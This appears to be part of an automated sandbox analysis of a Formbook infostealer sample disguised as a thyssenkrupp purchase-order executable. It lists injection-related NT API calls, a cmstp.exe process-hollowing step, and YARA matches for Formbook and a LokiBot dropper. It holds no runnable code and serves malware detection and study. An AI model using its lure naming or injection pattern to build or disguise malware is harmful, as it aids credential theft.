      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E95D0 NtClose,LdrInitializeThunk,1_2_1E3E95D0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,1_2_1E3E9A20
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E3E9A00
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,1_2_1E3E9A50
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E3E9860
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,1_2_1E3E9840
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E3E98F0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E3E9910
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,1_2_1E3E99A0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9610 NtEnumerateValueKey,1_2_1E3E9610
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9670 NtQueryInformationProcess,1_2_1E3E9670
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9650 NtQueryValueKey,1_2_1E3E9650
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E96D0 NtCreateKey,1_2_1E3E96D0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9730 NtQueryVirtualMemory,1_2_1E3E9730
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EA710 NtOpenProcessToken,1_2_1E3EA710
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EA770 NtOpenThread,1_2_1E3EA770
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9770 NtSetInformationFile,1_2_1E3E9770
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9760 NtOpenProcess,1_2_1E3E9760
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9FE0 NtCreateMutant,1_2_1E3E9FE0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EAD30 NtSetContextThread,1_2_1E3EAD30
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9520 NtWaitForSingleObject,1_2_1E3E9520
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9560 NtWriteFile,1_2_1E3E9560
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E95F0 NtQueryInformationFile,1_2_1E3E95F0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A10 NtQuerySection,1_2_1E3E9A10
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9A80 NtOpenDirectoryObject,1_2_1E3E9A80
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9B00 NtSetValueKey,1_2_1E3E9B00
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EA3B0 NtGetContextThread,1_2_1E3EA3B0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9820 NtEnumerateKey,1_2_1E3E9820
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3EB040 NtSuspendThread,1_2_1E3EB040
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E98A0 NtWriteVirtualMemory,1_2_1E3E98A0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E9950 NtQueueApcThread,1_2_1E3E9950
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3E99D0 NtCreateProcessEx,1_2_1E3E99D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B395D0 NtClose,LdrInitializeThunk,6_2_04B395D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39540 NtReadFile,LdrInitializeThunk,6_2_04B39540
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04B396E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B396D0 NtCreateKey,LdrInitializeThunk,6_2_04B396D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04B39660
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39650 NtQueryValueKey,LdrInitializeThunk,6_2_04B39650
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39780 NtMapViewOfSection,LdrInitializeThunk,6_2_04B39780
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39FE0 NtCreateMutant,LdrInitializeThunk,6_2_04B39FE0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39710 NtQueryInformationToken,LdrInitializeThunk,6_2_04B39710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04B39860
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39840 NtDelayExecution,LdrInitializeThunk,6_2_04B39840
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B399A0 NtCreateSection,LdrInitializeThunk,6_2_04B399A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04B39910
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A50 NtCreateFile,LdrInitializeThunk,6_2_04B39A50
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B395F0 NtQueryInformationFile,6_2_04B395F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3AD30 NtSetContextThread,6_2_04B3AD30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39520 NtWaitForSingleObject,6_2_04B39520
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39560 NtWriteFile,6_2_04B39560
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39610 NtEnumerateValueKey,6_2_04B39610
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39670 NtQueryInformationProcess,6_2_04B39670
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B397A0 NtUnmapViewOfSection,6_2_04B397A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39730 NtQueryVirtualMemory,6_2_04B39730
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A710 NtOpenProcessToken,6_2_04B3A710
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A770 NtOpenThread,6_2_04B3A770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39770 NtSetInformationFile,6_2_04B39770
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39760 NtOpenProcess,6_2_04B39760
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B398A0 NtWriteVirtualMemory,6_2_04B398A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B398F0 NtReadVirtualMemory,6_2_04B398F0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39820 NtEnumerateKey,6_2_04B39820
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3B040 NtSuspendThread,6_2_04B3B040
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B399D0 NtCreateProcessEx,6_2_04B399D0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39950 NtQueueApcThread,6_2_04B39950
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A80 NtOpenDirectoryObject,6_2_04B39A80
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A20 NtResumeThread,6_2_04B39A20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A10 NtQuerySection,6_2_04B39A10
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39A00 NtProtectVirtualMemory,6_2_04B39A00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B3A3B0 NtGetContextThread,6_2_04B3A3B0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B39B00 NtSetValueKey,6_2_04B39B00
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979E70 NtClose,6_2_02979E70
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979F20 NtAllocateVirtualMemory,6_2_02979F20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979DF0 NtReadFile,6_2_02979DF0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D40 NtCreateFile,6_2_02979D40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D92 NtCreateFile,6_2_02979D92
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979DEA NtReadFile,6_2_02979DEA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02979D3B NtCreateFile,6_2_02979D3B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0A520_2_021F0A52
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0B7B0_2_021F0B7B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F89870_2_021F8987
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F361D0_2_021F361D
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0A0F0_2_021F0A0F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F126B0_2_021F126B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F96A30_2_021F96A3
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F06D50_2_021F06D5
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F46FF0_2_021F46FF
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F734A0_2_021F734A
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F976B0_2_021F976B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F07690_2_021F0769
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F879F0_2_021F879F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F6BFB0_2_021F6BFB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F87E90_2_021F87E9
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F380B0_2_021F380B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F40750_2_021F4075
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F10B30_2_021F10B3
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F0CAE0_2_021F0CAE
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9CDF0_2_021F9CDF
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F90CB0_2_021F90CB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F091B0_2_021F091B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F99560_2_021F9956
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F09630_2_021F0963
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 0_2_021F9DDB0_2_021F9DDB
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3C6E301_2_1E3C6E30
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E46D6161_2_1E46D616
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E472EF71_2_1E472EF7
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E47DFCE1_2_1E47DFCE
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E471FF11_2_1E471FF1
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E46D4661_2_1E46D466
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3B841F1_2_1E3B841F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E471D551_2_1E471D55
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3A0D201_2_1E3A0D20
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E472D071_2_1E472D07
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4725DD1_2_1E4725DD
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3D25811_2_1E3D2581
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3BD5E01_2_1E3BD5E0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E45FA2B1_2_1E45FA2B
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4722AE1_2_1E4722AE
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E472B281_2_1E472B28
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3CAB401_2_1E3CAB40
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3DEBB01_2_1E3DEBB0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E46DBD21_2_1E46DBD2
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4603DA1_2_1E4603DA
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4610021_2_1E461002
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E47E8241_2_1E47E824
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3D20A01_2_1E3D20A0
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3BB0901_2_1E3BB090
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4728EC1_2_1E4728EC
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E4720A81_2_1E4720A8
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3C41201_2_1E3C4120
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_1E3AF9001_2_1E3AF900
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000810691_2_00081069
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000898621_2_00089862
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000810721_2_00081072
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_00082CEC1_2_00082CEC
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_00082CF21_2_00082CF2
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000881321_2_00088132
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_0008AA321_2_0008AA32
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_00085B1F1_2_00085B1F
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_00085B221_2_00085B22
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000BD1941_2_000BD194
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000BE2411_2_000BE241
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: 1_2_000A2D901_2_000A2D90
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B0841F6_2_04B0841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BBD4666_2_04BBD466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B225816_2_04B22581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B0D5E06_2_04B0D5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC25DD6_2_04BC25DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04AF0D206_2_04AF0D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC2D076_2_04BC2D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC1D556_2_04BC1D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC2EF76_2_04BC2EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B16E306_2_04B16E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BBD6166_2_04BBD616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC1FF16_2_04BC1FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BCDFCE6_2_04BCDFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B220A06_2_04B220A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC20A86_2_04BC20A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B0B0906_2_04B0B090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC28EC6_2_04BC28EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BCE8246_2_04BCE824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BB10026_2_04BB1002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B141206_2_04B14120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04AFF9006_2_04AFF900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC22AE6_2_04BC22AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04B2EBB06_2_04B2EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BB03DA6_2_04BB03DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BBDBD26_2_04BBDBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_04BC2B286_2_04BC2B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297E2416_2_0297E241
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297D1946_2_0297D194
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02969E406_2_02969E40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02962FB06_2_02962FB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_0297DFE86_2_0297DFE8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 6_2_02962D906_2_02962D90
      Source: C:\Users\user\Desktop\Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeCode function: String function: 1E3AB150 appears 45 times
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04AFB150 appears 39 times
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.691920446.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000000.00000002.692698776.00000000021C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000000.684998082.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.762365893.000000001E62F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761538741.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.757401813.00000000000D0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe, 00000001.00000002.761594514.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeBinary or memory string: OriginalFilenamesweepers.exe vs Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.921168798.0000000002E40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.920987753.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.921197000.0000000002E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.922109924.0000000004FFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.757374606.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
